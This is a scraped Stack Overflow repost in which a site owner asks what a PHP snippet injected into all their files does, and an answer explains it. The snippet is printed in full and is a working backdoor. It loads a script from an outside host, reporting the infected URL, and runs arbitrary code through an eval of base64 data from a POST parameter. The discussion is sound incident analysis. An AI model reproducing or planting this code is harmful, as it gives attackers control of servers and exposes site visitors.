gpt4 book ai didi

javascript - 被黑了——有人知道这段 PHP 代码的作用吗?

转载 作者:可可西里 更新时间:2023-10-31 22:47:37 26 4
gpt4 key购买 nike

我们的服务器通过某种 SQL 注入(inject)方法(现已修补)被黑。我们所有的 PHP 文件都将其添加到每个文件的最顶部。

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

它似乎设置了一个 cookie,但我一开始并不知道它的作用。

任何能够理解这是做什么的专家以及可能创建的 Cookie 名称可能是什么样子的,以便我可以告诉任何用户等

更新看到该漏洞是由于 Zenphoto Gallery 软件中名为 Tiny_MCE 的插件引起的。

最佳答案

First it sets a cookie. (named lb11) to the value 102.

If it (later?) finds the cookie, it sets the cookie to a random value between 1000 and 9000, so that it doesn't do this again: Has the user request (and execute) a javascript, which sends which which infected URL made the call, and then refresh the page, (so nothing appears to have happened after the javascript has run.

But in any case, if the "showimg" parameter is passed to the page, it looks at the content of that page, and executes it on the server.

因此,如果此代码存在,它将运行 javascript(它还会通知服务器哪个 URL 被感染,然后让此人在受感染的服务器上运行任意代码(通过 showimg 参数)。

这有两层攻击,它可以用 javascript 攻击客户端,然后可以攻击服务器并在其上运行任意代码。

关于javascript - 被黑了——有人知道这段 PHP 代码的作用吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/8068871/

26 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com